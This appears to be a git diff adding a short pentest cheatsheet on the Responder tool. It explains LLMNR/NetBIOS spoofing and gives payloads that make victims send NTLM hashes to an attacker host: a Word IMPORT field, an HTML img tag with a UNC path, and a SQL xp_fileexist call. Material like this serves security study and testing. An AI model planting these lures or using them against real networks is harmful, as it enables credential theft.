|
|
@@ -0,0 +1,69 @@
|
|
|
+---
|
|
|
+title: Responder
|
|
|
+date: 2021-04-13
|
|
|
+categories: [cheatsheets]
|
|
|
+tags: [security, windows]
|
|
|
+---
|
|
|
+
|
|
|
+
|
|
|
+# Responder
|
|
|
+
|
|
|
+## General Features
|
|
|
+
|
|
|
+* LLMNR Spoofing
|
|
|
+* Netbios Spoofing
|
|
|
+* Capturing NTLM Hashes
|
|
|
+
|
|
|
+## Usage
|
|
|
+
|
|
|
+* Start by analysing the traffic with: `Responder -A`
|
|
|
+
|
|
|
+
|
|
|
+## LLMNR & Netbios Spoofing
|
|
|
+
|
|
|
+When computers ask for a unknown domain name the PC asks the network via broadcast.
|
|
|
+Responder can answer to those LLMNR Questions and phish NTLM hashes by telling
|
|
|
+the victim that the responder host is the goal computer.
|
|
|
+
|
|
|
+**Occures when accessing:**
|
|
|
+
|
|
|
+* Mistyped share name
|
|
|
+* Mistyped webpage
|
|
|
+* Miconfigured DNS server/client
|
|
|
+* WPAD (Every false attempt will result in a broadcast)
|
|
|
+* Windows automatically searches when typing stuff into the Windows Menu (Win Key)
|
|
|
+
|
|
|
+## NTLM via UNC Path
|
|
|
+
|
|
|
+### Word Files
|
|
|
+
|
|
|
+* [ ] Tested
|
|
|
+
|
|
|
+Open Word
|
|
|
+ -> Ctrl+F9
|
|
|
+ -> IMPORT "\\\\<Responder-IP>\\1.jpg"
|
|
|
+ -> Right Click
|
|
|
+ -> Edit Field
|
|
|
+ -> check "Data not stored in document"
|
|
|
+ -> Save & Close
|
|
|
+
|
|
|
+### HTML Files
|
|
|
+
|
|
|
+Just link to an Image from a share:
|
|
|
+
|
|
|
+```
|
|
|
+<img src="\\<responder-ip>\1.jpg">
|
|
|
+```
|
|
|
+
|
|
|
+### SQL Servers
|
|
|
+
|
|
|
+* If an attacker owned an SQL user that can execute the `xp_fileexist` function, a UNC path can be specified:
|
|
|
+
|
|
|
+```
|
|
|
+EXEC master.dbo.xp_fileexist '\\<responder-ip>\\nonexistingfile'
|
|
|
+```
|
|
|
+
|
|
|
+# Resources
|
|
|
+
|
|
|
+- https://www.cynet.com/attack-techniques-hands-on/llmnr-nbt-ns-poisoning-and-credential-access-using-responder/
|
|
|
+
|
Marius Schwarz